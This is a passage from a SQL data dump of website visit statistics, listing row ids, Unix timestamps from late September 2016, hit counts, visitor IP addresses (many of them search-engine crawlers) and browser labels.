),(64835,1475095976,1,1,0,0,'51.255.65.87','other'),(64836,1475096264,1,0,1,0,'66.249.75.187',''),(64837,1475098177,1,1,0,0,'164.132.161.78','other'),(64838,1475099054,1,0,1,0,'66.249.75.179',''),(64839,1475101254,3,3,0,0,'141.8.183.25','other'),(64840,1475101338,1,0,1,0,'66.249.76.45',''),(64841,1475101571,1,1,0,0,'207.46.13.24','other'),(64842,1475101935,1,1,0,0,'163.172.66.165','other'),(64843,1475102287,1,1,0,0,'51.255.65.70','other'),(64844,1475102655,1,1,0,0,'130.193.50.34','other'),(64845,1475103316,1,1,0,0,'163.172.65.216','other'),(64846,1475103341,1,1,0,0,'164.132.161.76','other'),(64847,1475104111,1,0,1,0,'66.249.75.183',''),(64848,1475104532,1,1,0,0,'164.132.161.64','other'),(64849,1475105074,1,0,1,0,'66.249.76.45',''),(64850,1475105199,1,0,1,0,'66.249.76.46',''),(64851,1475106812,1,0,1,0,'66.249.76.47',''),(64852,1475107171,1,0,1,0,'66.249.75.187',''),(64853,1475107352,1,1,0,0,'93.158.152.84','other'),(64854,1475107586,1,1,0,0,'207.46.13.118','other'),(64855,1475107794,1,1,0,0,'141.8.142.58','other'),(64856,1475107812,166,166,0,0,'92.238.226.245','other'),(64857,1475108894,1,0,1,0,'66.249.75.187',''),(64858,1475110880,1,0,1,0,'66.249.76.45',''),(64859,1475110907,1,1,0,0,'51.255.65.59','other'),(64860,1475111952,1,1,0,0,'163.172.65.227','other'),(64861,1475112708,15,15,0,0,'173.208.157.186','other'),(64862,1475114126,1,1,0,0,'51.255.65.87','other'),(64863,1475114570,1,1,0,0,'164.132.161.7','other'),(64864,1475114757,2,2,0,0,'92.113.125.40','chrome'),(64865,1475115172,1,0,1,0,'66.249.75.187',''),(64866,1475115216,1,0,1,0,'66.249.69.69',''),(64867,1475115899,1,1,0,0,'163.172.66.49','other'),(64868,1475116759,1,1,0,0,'109.63.222.216','chrome'),(64869,1475117735,1,0,1,0,'66.249.76.47',''),(64870,1475118369,4,4,0,0,'91.121.109.55','other'),(64871,1475118776,1,0,1,0,'66.249.76.47',''),(64872,1475119192,1,0,1,0,'66.249.75.183',''),(64873,1475119358,1,0,1,0,'66.249.76.45',''),(64874,1475119421,1,0,1,0,'66.249.75.187',''),(64875,1475119463,1,1,0,0,'92.113.125.40','chrome'),(64876,1475119807,1,0,1,0,'66.249.76.47',''),(64877,1475120714,1,1,0,0,'37.147.97.26','chrome'),(64878,1475120972,1,1,0,0,'141.0.13.157','other'),(64879,1475123352,1,0,1,0,'66.249.76.46',''),(64880,1475123667,2,2,0,0,'174.34.135.242','other'),(64881,1475125119,2,0,2,0,'66.249.76.47',''),(64882,1475126273,1,0,1,0,'66.249.76.46',''),(64883,1475127083,1,1,0,0,'94.179.19.49','firefox'),(64884,1475127821,2,0,2,0,'66.249.75.179',''),(64885,1475128277,1,0,1,0,'66.249.76.46',''),(64886,1475128440,1,1,0,0,'66.249.93.15','chrome'),(64887,1475128883,1,1,0,0,'128.68.194.166','other'),(64888,1475128907,1,1,0,0,'180.76.15.15','other'),(64889,1475129296,1,1,0,0,'40.77.167.93','other'),(64890,1475129305,2,2,0,0,'46.4.116.197','other'),(64891,1475131097,1,0,1,0,'66.249.76.46',''),(64892,1475131668,1,1,0,0,'51.255.65.37','other'),(64893,1475132042,1,0,1,0,'66.249.76.77',''),(64894,1475132207,1,0,1,0,'66.249.69.69',''),(64895,1475132492,2,2,0,0,'31.128.250.93','chrome'),(64896,1475132502,1,1,0,0,'66.249.76.45','chrome'),(64897,1475132937,1,1,0,0,'46.188.54.118','msie'),(64898,1475133021,1,0,1,0,'68.180.229.190',''),(64899,1475133099,1,0,1,0,'68.180.229.34',''),(64900,1475133118,1,0,1,0,'66.249.75.179',''),(64901,1475133296,1,1,0,0,'91.196.178.66','firefox'),(64902,1475133343,1,0,1,0,'66.249.76.46',''),(64903,1475133452,1,1,0,0,'91.196.178.67','firefox'),(64904,1475134993,1,1,0,0,'91.196.178.37','chrome'),(64905,1475135023,1,1,0,0,'141.8.183.25','other'),(64906,1475135790,1,0,1,0,'66.249.76.47',''),(64907,1475136155,1,1,0,0,'130.180.216.73','chrome'),(64908,1475136428,1,1,0,0,'66.102.9.25','other'),(64909,1475136458,1,0,1,0,'66.249.75.187',''),(64910,1475136489,1,0,1,0,'66.249.76.45',''),(64911,1475136555,1,0,1,0,'66.249.76.46',''),(64912,1475136926,1,0,1,0,'66.249.76.47',''),(64913,1475137014,1,1,0,0,'130.180.216.240','firefox'),(64914,1475138108,1,1,0,0,'94.179.86.205','chrome'),(64915,1475138120,1,1,0,0,'130.193.51.19','other'),(64916,1475139056,1,0,1,0,'66.249.76.47',''),(64917,1475139249,1,1,0,0,'40.77.167.93','other'),(64918,1475139279,1,1,0,0,'180.76.15.5','other'),(64919,1475139517,1,1,0,0,'91.196.178.34','chrome'),(64920,1475139972,1,0,1,0,'66.249.76.46',''),(64921,1475140003,1,1,0,0,'66.102.9.29','other'),(64922,1475140515,1,0,1,0,'68.180.229.190',''),(64923,1475140790,1,1,0,0,'69.30.213.82','other'),(64924,1475141792,1,1,0,0,'94.179.70.229','firefox'),(64925,1475142108,2,0,2,0,'66.249.76.46',''),(64926,1475142110,1,0,1,0,'66.249.75.183',''),(64927,1475142736,1,1,0,0,'95.134.203.113','chrome'),(64928,1475142818,1,1,0,0,'37.73.234.12','chrome'),(64929,1475142936,1,0,1,0,'66.249.76.79',''),(64930,1475143313,1,1,0,0,'195.177.73.136','msie'),(64931,1475143605,1,1,0,0,'91.196.178.66','other'),(64932,1475144032,1,1,0,0,'91.196.178.66','chrome'),(64933,1475144059,1,1,0,0,'66.102.9.25','other'),(64934,1475145947,1,1,0,0,'91.196.178.68','chrome'),(64935,1475146087,2,2,0,0,'130.193.50.34','other'),(64936,1475146500,1,1,0,0,'130.193.51.19','other'),(64937,1475146560,1,1,0,0,'178.94.64.34','firefox'),(64938,1475146914,1,0,1,0,'66.249.75.183',''),(64939,1475147100,1,1,0,0,'66.102.9.27','other'),(64940,1475147189,1,0,1,0,'66.249.76.45',''),(64941,1475148413,2,2,0,0,'130.193.50.34','other'),(64942,1475148866,1,0,1,0,'66.249.75.179',''),(64943,1475149107,1,1,0,0,'141.8.183.25','other'),(64944,1475149415,1,1,0,0,'91.196.178.66','firefox'),(64945,1475149745,1,1,0,0,'66.249.93.15','chrome'),(64946,1475149788,1,1,0,0,'66.249.93.14','chrome'),(64947,1475149902,1,1,0,0,'130.193.51.19','other'),(64948,1475150640,1,0,1,0,'66.249.76.45',''),(64949,1475151142,1,1,0,0,'66.102.9.29','other'),(64950,1475151317,1,1,0,0,'66.249.76.45','chrome'),(64951,1475151700,1,1,0,0,'130.193.50.34','other'),(64952,1475152613,2,2,0,0,'91.196.178.66','chrome'),(64953,1475152978,1,1,0,0,'91.196.178.66','firefox'),(64954,1475152996,1,0,1,0,'66.249.76.45',''),(64955,1475153356,1,1,0,0,'91.124.182.3','firefox'),(64956,1475153481,2,2,0,0,'141.8.183.25','other'),(64957,1475153536,1,1,0,0,'157.55.39.6','other'),(64958,1475153621,1,0,1,0,'66.249.76.77',''),(64959,1475153757,1,1,0,0,'130.193.50.34','other'),(64960,1475153934,1,1,0,0,'93.171.243.147','chrome'),(64961,1475154864,1,1,0,0,'66.102.9.25','other'),(64962,1475154886,1,0,1,0,'68.180.229.34',''),(64963,1475154918,1,1,0,0,'91.196.178.67','firefox'),(64964,1475155564,1,1,0,0,'130.193.50.34','other'),(64965,1475155711,2,2,0,0,'141.8.183.25','other'),(64966,1475157629,1,1,0,0,'66.249.76.45','chrome'),(64967,1475157939,1,1,0,0,'66.102.9.25','other'),(64968,1475158131,1,1,0,0,'91.196.178.34','chrome'),(64969,1475159658,1,0,1,0,'66.249.76.77',''),(64970,1475160286,1,0,1,0,'66.249.76.46',''),(64971,1475160469,1,0,1,0,'66.249.76.47',''),(64972,1475161628,1,1,0,0,'66.102.9.27','other'),(64973,1475161810,72,72,0,0,'69.30.213.82','other'),(64974,1475162345,1,1,0,0,'178.24.113.141','other'),(64975,1475163796,1,1,0,0,'91.124.182.3','firefox'),(64976,1475164004,1,0,1,0,'68.180.229.190',''),(64977,1475165117,1,1,0,0,'66.102.9.27','other'),(64978,1475166784,1,1,0,0,'91.196.178.67','firefox'),(64979,1475168636,2,0,2,0,'66.249.76.45',''),(64980,1475168701,1,1,0,0,'66.102.9.29','other'),(64981,1475169389,1,0,1,0,'66.249.73.179',''),(64982,1475169432,1,0,1,0,'66.249.76.47',''),(64983,1475169646,1,0,1,0,'66.249.76.46',''),(64984,1475171109,1,1,0,0,'46.211.144.48','chrome'),(64985,1475171593,1,1,0,0,'94.179.88.20','chrome'),(64986,1475172197,1,1,0,0,'66.249.65.56','chrome'),(64987,1475172374,1,1,0,0,'66.102.9.27','other'),(64988,1475172677,1,0,1,0,'66.249.76.46',''),(64989,1475172678,1,0,1,0,'66.249.76.45',''),(64990,1475173763,1,0,1,0,'66.249.76.46',''),(64991,1475174375,2,0,2,0,'66.249.73.187',''),(64992,1475175084,1,0,1,0,'66.249.76.79',''),(64993,1475175904,1,1,0,0,'66.102.9.29','other'),(64994,1475176717,1,0,1,0,'66.249.73.179',''),(64995,1475176733,1,0,1,0,'66.249.76.45',''),(64996,1475176911,1,0,1,0,'66.249.76.47',''),(64997,1475178804,1,1,0,0,'194.213.23.3','chrome'),(64998,1475179536,3,3,0,0,'141.8.183.25','other'),(64999,1475179610,1,1,0,0,'93.158.152.51','other'),(65000,1475179630,1,1,0,0,'66.102.9.27','other'),(65001,1475179774,1,0,1,0,'66.249.76.45',''),(65002,1475179786,3,3,0,0,'130.193.51.19','other'),(65003,1475180160,1,0,1,0,'66.249.76.47',''),(65004,1475180229,2,2,0,0,'141.8.142.58','other'),(65005,1475180357,1,1,0,0,'130.193.50.34','other'),(65006,1475180623,1,1,0,0,'141.8.183.25','other'),(65007,1475181027,1,1,0,0,'46.211.205.169','msie'),(65008,1475182621,1,1,0,0,'130.193.50.34','other'),(65009,1475182784,2,2,0,0,'157.55.39.67','other'),(65010,1475183099,1,1,0,0,'66.102.9.29','other'),(65011,1475184437,1,0,1,0,'66.249.73.179',''),(65012,1475184536,1,1,0,0,'180.76.15.150','other'),(65013,1475185051,1,0,1,0,'66.249.73.183',''),(65014,1475185411,1,0,1,0,'66.249.73.187',''),(65015,1475185436,1,0,1,0,'66.249.76.46',''),(65016,1475185952,3,0,3,0,'68.180.229.34',''),(65017,1475186862,2,0,2,0,'68.180.229.34',''),(65018,1475186906,1,1,0,0,'66.102.9.25','other'),(65019,1475187880,1,0,1,0,'66.249.76.45',''),(65020,1475187927,1,0,1,0,'66.249.73.179',''),(65021,1475189833,1,0,1,0,'66.249.73.179',''),(65022,1475190136,1,1,0,0,'141.8.183.25','other'),(65023,1475190423,1,1,0,0,'66.102.9.29','other'),(65024,1475190542,1,0,1,0,'66.249.76.47',''),(65025,1475190943,1,1,0,0,'5.255.250.41','other'),(65026,1475191833,1,1,0,0,'163.172.65.61','other'),(65027,1475194371,1,1,0,0,'66.102.9.29','other'),(65028,1475194376,1,1,0,0,'163.172.65.56','other'),(65029,1475194625,1,0,1,0,'66.249.76.46',''),(65030,1475195956,1,1,0,0,'163.172.65.20','other'),(65031,1475196316,1,1,0,0,'144.76.4.148','other'),(65032,1475197193,1,0,1,0,'66.249.76.81',''),(65033,1475197221,1,1,0,0,'163.172.65.110','other'),(65034,1475197971,1,1,0,0,'66.102.9.27','other'),(65035,1475198873,1,1,0,0,'130.193.50.34','other'),(65036,1475199038,3,3,0,0,'130.193.51.19','other'),(65037,1475199467,3,3,0,0,'141.8.183.25','other'),(65038,1475199780,2,2,0,0,'130.193.50.34','other'),(65039,1475201099,1,1,0,0,'66.102.9.27','other'),(65040,1475203757,2,2,0,0,'141.8.183.25','other'),(65041,1475204119,1,1,0,0,'130.193.51.19','other'),(65042,1475204370,1,1,0,0,'109.63.143.84','msie'),(65043,1475204785,1,1,0,0,'157.55.39.25','other'),(65044,1475204984,1,1,0,0,'51.255.65.43','other'),(65045,1475205175,1,1,0,0,'66.102.9.27','other'),(65046,1475205325,1,0,1,0,'66.249.76.47',''),(65047,1475206353,1,1,0,0,'188.255.24.96','msie'),(65048,1475207037,4,4,0,0,'130.193.50.34','other'),(65049,1475208937,1,1,0,0,'40.77.167.10','other'),(65050,1475210290,2,2,0,0,'141.8.183.25','other'),(65051,1475210356,1,1,0,0,'188.32.231.176','other'),(65052,1475210429,1,1,0,0,'141.8.142.58','other'),(65053,1475210700,1,1,0,0,'130.193.50.34','other'),(65054,1475212705,1,1,0,0,'130.193.51.19','other'),(65055,1475212786,1,1,0,0,'164.132.161.33','other'),(65056,1475213119,38,38,0,0,'195.154.255.20','other'),(65057,1475213233,1,0,1,0,'66.249.76.46',''),(65058,1475214403,1,1,0,0,'164.132.161.35','other'),(65059,1475214447,1,1,0,0,'91.196.178.72','chrome'),(65060,1475214487,1,1,0,0,'163.172.65.227','other'),(65061,1475214560,1,1,0,0,'66.249.93.13','chrome'),(65062,1475214969,2,2,0,0,'130.193.50.34','other'),(65063,1475215021,1,0,1,0,'66.249.73.187',''),(65064,1475215214,1,1,0,0,'164.132.161.82','other'),(65065,1475215817,1,1,0,0,'51.255.65.60','other'),(65066,1475216517,1,1,0,0,'91.196.178.34','chrome'),(65067,1475216533,1,1,0,0,'91.196.178.66','firefox'),(65068,1475216556,1,1,0,0,'141.8.142.67','other'),(65069,1475217521,1,1,0,0,'141.8.183.25','other'),(65070,1475217888,1,1,0,0,'180.76.15.141','other'),(65071,1475219264,1,1,0,0,'141.8.142.58','other'),(65072,1475219303,1,1,0,0,'91.196.178.66','firefox'),(65073,1475219730,1,1,0,0,'82.207.91.234','firefox'),(65074,1475221043,1,1,0,0,'91.196.178.66','chrome'),(65075,1475221115,1,1,0,0,'141.8.142.58','other'),(65076,1475221243,1,1,0,0,'130.193.50.34','other'),(65077,1475221288,1,1,0,0,'164.132.161.14','other'),(65078,1475221363,1,1,0,0,'130.193.51.19','other'),(65079,1475221997,1,1,0,0,'157.55.39.25','other'),(65080,1475222111,2,2,0,0,'94.179.75.31','firefox'),(65081,1475222343,1,1,0,0,'51.255.65.34','other'),(65082,1475222769,1,1,0,0,'163.172.64.234','other'),(65083,1475223239,1,1,0,0,'94.179.125.78','firefox'),(65084,1475223674,1,1,0,0,'180.76.15.12','other'),(65085,1475224157,1,1,0,0,'94.179.125.78','firefox'),(65086,1475224660,1,1,0,0,'163.172.66.94','other'),(65087,1475225260,1,1,0,0,'195.211.173.244','chrome'),(65088,1475225536,1,1,0,0,'164.132.161.34','other'),(65089,1475225644,1,1,0,0,'130.193.50.34','other'),(65090,1475225978,1,1,0,0,'163.172.64.224','other'),(65091,1475226376,1,1,0,0,'66.102.9.27','other'),(65092,1475227361,1,1,0,0,'141.8.142.58','other'),(65093,1475227482,1,1,0,0,'141.8.183.25','other'),(65094,1475227536,1,1,0,0,'164.132.161.49','other'),(65095,1475228120,1,1,0,0,'157.55.39.67','other'),(65096,1475228607,2,2,0,0,'130.193.50.34','other'),(65097,1475229314,1,1,0,0,'92.113.49.34','chrome'),(65098,1475229853,2,2,0,0,'130.193.50.34','other'),(65099,1475229875,1,1,0,0,'164.132.161.48','other'),(65100,1475229932,1,1,0,0,'66.102.9.29','other'),(65101,1475231617,1,1,0,0,'130.193.51.19','other'),(65102,1475232575,1,1,0,0,'163.172.66.48','other'),(65103,1475232817,1,1,0,0,'51.255.65.61','other'),(65104,1475233548,1,1,0,0,'66.102.9.27','other'),(65105,1475235370,1,1,0,0,'51.255.65.39','other'),(65106,1475235408,1,1,0,0,'163.172.65.221','other'),(65107,1475235649,1,1,0,0,'95.133.36.109','chrome'),(65108,1475236004,1,1,0,0,'163.172.64.227','other'),(65109,1475236604,1,0,1,0,'66.249.76.45',''),(65110,1475236925,1,1,0,0,'141.8.183.25','other'),(65111,1475237100,1,1,0,0,'66.102.9.25','other'),(65112,1475237927,1,1,0,0,'66.249.76.46','chrome'),(65113,1475238827,1,1,0,0,'130.193.50.34','other'),(65114,1475239723,1,0,1,0,'66.249.73.187',''),(65115,1475240357,1,1,0,0,'163.172.66.115','other'),(65116,1475240635,1,1,0,0,'141.8.183.25','other'),(65117,1475240759,1,1,0,0,'66.102.9.27','other'),(65118,1475240777,2,2,0,0,'130.193.50.34','other'),(65119,1475240794,1,1,0,0,'66.249.76.46','chrome'),(65120,1475240882,1,0,1,0,'66.249.73.143',''),(65121,1475242114,1,1,0,0,'130.193.50.34','other'),(65122,1475242231,1,1,0,0,'180.76.15.135','other'),(65123,1475242427,1,1,0,0,'174.129.237.157','other'),(65124,1475242710,1,1,0,0,'164.132.161.38','other'),(65125,1475242775,1,1,0,0,'95.133.232.11','chrome'),(65126,1475242952,1,1,0,0,'66.249.73.179','chrome'),(65127,1475243045,1,1,0,0,'91.192.152.132','opera'),(65128,1475243256,1,1,0,0,'130.193.50.34','other'),(65129,1475243307,1,1,0,0,'51.255.65.21','other'),(65130,1475243669,1,1,0,0,'163.172.65.230','other'),(65131,1475243839,1,1,0,0,'66.249.76.47','chrome'),(65132,1475244149,1,1,0,0,'163.172.66.138','other'),(65133,1475244349,1,1,0,0,'66.102.9.25','other'),(65134,1475244602,1,1,0,0,'51.255.65.58','other'),(65135,1475245052,1,1,0,0,'51.255.65.21','other'),(65136,1475245109,1,1,0,0,'51.255.65.10','other'),(65137,1475245240,1,1,0,0,'91.196.178.162','chrome'),(65138,1475245364,1,1,0,0,'163.172.66.105','other'),(65139,1475247139,2,2,0,0,'141.8.183.25','other'),(65140,1475247965,1,1,0,0,'66.102.9.29','other'),(65141,1475247974,1,1,0,0,'163.172.66.60','other'),(65142,1475248190,1,1,0,0,'66.102.9.27','chrome'),(65143,1475248520,1,1,0,0,'164.132.161.6','other'),(65144,1475248887,2,2,0,0,'130.193.50.34','other'),(65145,1475249439,1,1,0,0,'51.255.65.16','other'),(65146,1475250719,1,0,1,0,'66.249.76.81',''),(65147,1475251361,1,1,0,0,'163.172.65.130','other'),(65148,1475251520,1,1,0,0,'66.102.9.25','other'),(65149,1475251878,1,1,0,0,'141.8.183.25','other'),(65150,1475251994,1,1,0,0,'130.193.51.19','other'),(65151,1475252172,1,1,0,0,'163.172.64.254','other'),(65152,1475252257,1,1,0,0,'66.249.76.77','chrome'),(65153,1475252338,1,1,0,0,'51.255.65.23','other'),(65154,1475252506,2,2,0,0,'130.193.50.34','other'),(65155,1475252655,1,1,0,0,'157.55.39.25','other'),(65156,1475253004,1,1,0,0,'130.193.51.19','other'),(65157,1475253124,1,1,0,0,'141.8.142.58','other'),(65158,1475254769,1,1,0,0,'141.8.183.25','other'),(65159,1475254918,1,1,0,0,'130.193.50.34','other'),(65160,1475255103,1,1,0,0,'66.102.9.25','other'),(65161,1475257062,1,1,0,0,'164.132.161.68','other'),(65162,1475257151,2,2,0,0,'5.9.88.103','other'),(65163,1475257205,3,3,0,0,'130.193.50.34','other'),(65164,1475257510,1,1,0,0,'141.8.183.25','other'),(65165,1475258005,1,1,0,0,'178.92.173.76','chrome'),(65166,1475258368,1,0,1,0,'66.249.76.45',''),(65167,1475258542,1,1,0,0,'157.55.39.67','other'),(65168,1475258701,1,1,0,0,'66.102.9.25','other'),(65169,1475259143,1,1,0,0,'163.172.65.115','other'),(65170,1475260090,1,1,0,0,'164.132.161.68','other'),(65171,1475260907,1,1,0,0,'192.198.86.186','chrome'),(65172,1475261295,1,1,0,0,'130.193.50.34','other'),(65173,1475261882,1,1,0,0,'164.132.161.66','other'),(65174,1475261932,1,1,0,0,'141.0.12.58','other'),(65175,1475262307,1,1,0,0,'66.102.9.27','other'),(65176,1475264251,1,1,0,0,'163.172.66.8','other'),(65177,1475265908,1,1,0,0,'66.102.9.25','other'),(65178,1475267661,1,1,0,0,'51.255.65.55','other'),(65179,1475268431,1,1,0,0,'91.196.178.65','firefox'),(65180,1475269746,1,1,0,0,'66.102.9.25','other'),(65181,1475270450,1,1,0,0,'180.76.15.136','other'),(65182,1475271225,1,1,0,0,'51.255.65.49','other'),(65183,1475271823,1,1,0,0,'149.202.54.71','other'),(65184,1475271847,1,1,0,0,'163.172.66.44','other'),(65185,1475272132,1,1,0,0,'51.255.65.83','other'),(65186,1475272136,1,1,0,0,'51.255.65.26','other'),(65187,1475272180,1,1,0,0,'164.132.161.95','other'),(65188,1475272460,1,1,0,0,'180.76.15.148','other'),(65189,1475272739,1,1,0,0,'163.172.64.181','other'),(65190,1475273068,1,1,0,0,'130.193.50.34','other'),(65191,1475273250,1,1,0,0,'66.102.9.29','other'),(65192,1475273651,1,1,0,0,'180.76.15.150','other'),(65193,1475274004,1,1,0,0,'163.172.66.111','other'),(65194,1475274149,4,4,0,0,'88.198.16.12','other'),(65195,1475274695,1,1,0,0,'164.132.161.79','other'),(65196,1475274825,5,5,0,0,'92.238.226.245','other'),(65197,1475275040,1,0,1,0,'66.249.75.183',''),(65198,1475275438,1,1,0,0,'157.55.39.67','other'),(65199,1475275659,1,1,0,0,'180.76.15.157','other'),(65200,1475276704,1,1,0,0,'66.102.9.29','other'),(65201,1475277198,1,0,1,0,'66.249.75.179',''),(65202,1475277724,1,1,0,0,'164.132.161.57','other'),(65203,1475278014,1,1,0,0,'51.255.65.68','other'),(65204,1475278094,1,0,1,0,'66.249.76.45',''),(65205,1475278204,1,1,0,0,'164.132.161.50','other'),(65206,1475279152,2,2,0,0,'91.194.84.106','other'),(65207,1475279716,1,0,1,0,'66.249.76.45',''),(65208,1475280300,1,1,0,0,'66.102.9.29','other'),(65209,1475281877,1,1,0,0,'46.242.66.6','msie'),(65210,1475282617,1,1,0,0,'157.55.39.67','other'),(65211,1475283899,1,1,0,0,'66.102.9.27','other'),(65212,1475285361,1,1,0,0,'51.255.65.6','other'),(65213,1475286857,1,1,0,0,'51.255.65.21','other'),(65214,1475286898,1,1,0,0,'51.255.65.73','other'),(65215,1475287486,1,1,0,0,'51.255.65.25','other'),(65216,1475287500,1,1,0,0,'66.102.9.27','other'),(65217,1475289085,1,1,0,0,'164.132.161.34','other'),(65218,1475289283,1,1,0,0,'163.172.65.9','other'),(65219,1475289691,1,1,0,0,'164.132.161.35','other'),(65220,1475289779,22,22,0,0,'69.30.198.242','other'),(65221,1475290118,1,1,0,0,'94.179.56.74','firefox'),(65222,1475290577,1,1,0,0,'163.172.66.183','other'),(65223,1475290851,1,0,1,0,'66.249.69.149',''),(65224,1475290866,1,0,1,0,'66.249.75.187',''),(65225,1475291101,1,1,0,0,'66.102.9.29','other'),(65226,1475291466,58,58,0,0,'46.4.120.3','other'),(65227,1475291826,1,1,0,0,'163.172.66.139','other'),(65228,1475291862,1,1,0,0,'94.179.56.74','firefox'),(65229,1475292584,1,1,0,0,'51.255.65.48','other'),(65230,1475293123,2,2,0,0,'174.129.237.157','other'),(65231,1475293289,1,1,0,0,'163.172.66.4','other'),(65232,1475293991,1,1,0,0,'88.198.16.153','other'),(65233,1475294048,2,2,0,0,'207.46.13.75','other'),(65234,1475294071,1,1,0,0,'157.55.39.67','other'),(65235,1475294249,1,1,0,0,'163.172.65.21','other'),(65236,1475294699,1,1,0,0,'66.102.9.29','other'),(65237,1475294852,1,1,0,0,'163.172.66.92','other'),(65238,1475295679,1,0,1,0,'66.249.76.45',''),(65239,1475297101,1,1,0,0,'163.172.66.45','other'),(65240,1475297477,1,1,0,0,'163.172.64.249','other'),(65241,1475297496,1,1,0,0,'51.255.65.65','other'),(65242,1475297708,1,1,0,0,'51.255.65.72','other'),(65243,1475298216,1,1,0,0,'51.255.65.43','other'),(65244,1475298355,4,4,0,0,'5.9.62.130','other'),(65245,1475298534,1,1,0,0,'164.132.161.51','other'),(65246,1475298579,1,1,0,0,'66.102.9.29','other'),(65247,1475299856,1,1,0,0,'174.129.237.157','other'),(65248,1475300155,1,0,1,0,'66.249.76.45',''),(65249,1475300640,1,1,0,0,'51.255.65.10','other'),(65250,1475301207,1,1,0,0,'51.255.65.69','other'),(65251,1475301708,1,1,0,0,'163.172.65.191','other'),(65252,1475302212,1,1,0,0,'66.102.9.25','other'),(65253,1475302603,1,1,0,0,'174.129.237.157','other'),(65254,1475303133,1,1,0,0,'91.124.182.3','firefox'),(65255,1475303481,1,1,0,0,'163.172.66.107','other'),(65256,1475303681,1,1,0,0,'164.132.161.46','other'),(65257,1475304504,1,1,0,0,'164.132.161.89','other'),(65258,1475305434,1,1,0,0,'91.124.182.3','firefox'),(65259,1475305459,1,1,0,0,'163.172.65.230','other'),(65260,1475305502,1,1,0,0,'66.102.9.25','other'),(65261,1475305614,1,1,0,0,'163.172.65.247','other'),(65262,1475307533,1,1,0,0,'163.172.65.111','other'),(65263,1475307672,1,1,0,0,'163.172.66.91','other'),(65264,1475308030,1,1,0,0,'163.172.65.58','other'),(65265,1475308207,1,1,0,0,'163.172.66.72','other'),(65266,1475308601,1,1,0,0,'51.255.65.26','other'),(65267,1475309008,1,1,0,0,'51.255.65.59','other'),(65268,1475309121,1,1,0,0,'66.102.9.27','other'),(65269,1475309391,1,1,0,0,'157.55.39.67','other'),(65270,1475309846,1,1,0,0,'40.77.167.61','other'),(65271,1475310121,1,1,0,0,'163.172.65.7','other'),(65272,1475312647,1,1,0,0,'163.172.66.155','other'),(65273,1475313097,1,1,0,0,'207.46.13.75','other'),(65274,1475313459,1,1,0,0,'163.172.65.7','other'),(65275,1475314616,1,1,0,0,'163.172.66.158','other'),(65276,1475316567,1,1,0,0,'163.172.65.5','other'),(65277,1475316605,1,1,0,0,'163.172.65.245','other'),(65278,1475318783,1,1,0,0,'163.172.66.150','other'),(65279,1475320003,1,1,0,0,'51.255.65.45','other'),(65280,1475320005,1,1,0,0,'157.55.39.67','other'),(65281,1475321163,1,1,0,0,'163.172.65.226','other'),(65282,1475322922,1,0,1,0,'66.249.76.46',''),(65283,1475323203,1,1,0,0,'51.255.65.16','other'),(65284,1475324004,1,1,0,0,'92.112.249.208','chrome'),(65285,1475325466,1,1,0,0,'164.132.161.46','other'),(65286,1475325799,2,0,2,0,'68.180.229.34',''),(65287,1475326342,1,1,0,0,'163.172.66.115','other'),(65288,1475326576,1,0,1,0,'66.249.75.179',''),(65289,1475327489,1,1,0,0,'66.102.9.29','other'),(65290,1475327653,1,1,0,0,'178.94.172.3','chrome'),(65291,1475328491,1,1,0,0,'164.132.161.25','other'),(65292,1475328878,1,1,0,0,'66.249.76.45','chrome'),(65293,1475328918,1,1,0,0,'163.172.65.227','other'),(65294,1475329556,4,4,0,0,'88.198.16.153','other'),(65295,1475329853,1,1,0,0,'91.196.178.164','other'),(65296,1475330233,1,1,0,0,'163.172.64.249','other'),(65297,1475330571,1,1,0,0,'164.132.161.68','other'),(65298,1475330767,1,1,0,0,'66.102.9.29','other'),(65299,1475330967,1,1,0,0,'164.132.161.74','other'),(65300,1475331032,1,1,0,0,'163.172.65.67','other'),(65301,1475331567,1,1,0,0,'66.249.76.77','chrome'),(65302,1475331899,1,0,1,0,'66.249.76.47',''),(65303,1475332027,1,0,1,0,'68.180.229.34',''),(65304,1475334310,1,1,0,0,'163.172.66.97','other'),(65305,1475334453,1,1,0,0,'66.102.9.29','other'),(65306,1475335303,1,1,0,0,'51.255.65.43','other'),(65307,1475335443,1,1,0,0,'95.133.40.130','chrome'),(65308,1475336246,1,1,0,0,'51.255.65.19','other'),(65309,1475336452,1,1,0,0,'164.132.161.59','other'),(65310,1475336550,1,0,1,0,'66.249.76.45',''),(65311,1475336578,1,0,1,0,'66.249.76.79',''),(65312,1475336726,1,1,0,0,'51.255.65.80','other'),(65313,1475336837,1,1,0,0,'157.55.39.67','other'),(65314,1475337371,1,1,0,0,'51.255.65.76','other'),(65315,1475337570,1,0,1,0,'66.249.76.46',''),(65316,1475338137,1,1,0,0,'66.102.9.27','other'),(65317,1475338141,1,1,0,0,'207.46.13.75','other'),(65318,1475338205,1,0,1,0,'66.249.76.47',''),(65319,1475338574,1,0,1,0,'66.249.75.187',''),(65320,1475338728,1,1,0,0,'164.132.161.76','other'),(65321,1475338902,1,1,0,0,'164.132.161.77','other'),(65322,1475339086,1,1,0,0,'164.132.161.28','other'),(65323,1475339099,1,1,0,0,'164.132.161.46','other'),(65324,1475339540,1,1,0,0,'91.196.178.103','chrome'),(65325,1475339655,1,1,0,0,'163.172.64.242','other'),(65326,1475340678,1,1,0,0,'207.46.13.75','other'),(65327,1475341023,1,0,1,0,'66.249.76.46',''),(65328,1475341664,1,1,0,0,'66.102.9.25','other'),(65329,1475342685,1,0,1,0,'66.249.76.46',''),(65330,1475343096,1,1,0,0,'164.132.161.76','other'),(65331,1475343118,1,1,0,0,'37.53.111.238','firefox'),(65332,1475343221,1,0,1,0,'66.249.76.47',''),(65333,1475343394,1,1,0,0,'164.132.161.16','other'),(65334,1475343785,1,0,1,0,'66.249.76.45',''),(65335,1475344410,1,1,0,0,'164.132.161.79','other'),(65336,1475345232,1,1,0,0,'163.172.65.129','other'),(65337,1475345273,1,0,1,0,'66.249.76.45',''),(65338,1475345375,1,1,0,0,'66.102.9.27','other'),(65339,1475345383,1,0,1,0,'66.249.75.183',''),(65340,1475345578,1,1,0,0,'180.76.15.160','other'),(65341,1475345596,1,0,1,0,'68.180.229.34',''),(65342,1475345818,3,0,3,0,'66.249.76.47',''),(65343,1475346225,1,1,0,0,'163.172.66.177','other'),(65344,1475346440,1,1,0,0,'164.132.161.85','other'),(65345,1475347199,1,1,0,0,'163.172.65.214','other'),(65346,1475348845,1,1,0,0,'66.102.9.25','other'),(65347,1475349497,1,1,0,0,'164.132.161.52','other'),(65348,1475349761,1,1,0,0,'207.46.13.75','other'),(65349,1475350425,1,0,1,0,'66.249.75.187',''),(65350,1475350615,1,0,1,0,'66.249.76.